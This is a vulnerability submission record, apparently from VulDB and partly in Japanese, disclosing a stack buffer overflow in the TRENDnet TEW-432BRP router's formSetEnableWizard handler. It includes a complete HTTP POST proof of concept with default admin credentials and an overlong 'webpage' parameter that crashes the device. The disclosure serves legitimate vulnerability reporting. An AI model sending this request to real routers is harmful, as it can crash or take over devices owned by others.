提出 #814770: TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow情報

タイトルTRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow
説明In formSetEnableWizard function, webpage is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the webpage to execute arbitrary code. POST /goform/formSetEnableWizard HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 837 Origin: http://192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.10.1/wizard.asp Upgrade-Insecure-Requests: 1 next=Next+%3E&start_wizard=0&webpage=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
ソース⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_13/13.md
ユーザー
 pjq_Buoy (UID 97666)
送信2026年04月28日 09:13 (1 月 ago)
モデレーション2026年05月30日 09:00 (1 month later)
ステータス承諾済み
VulDBエントリ367413 [TRENDnet TEW-432BRP 3.10B20 formSetEnableWizard start_wizard メモリ破損]
ポイント20

概要

Want to know what is going to be exploited?

We predict KEV entries!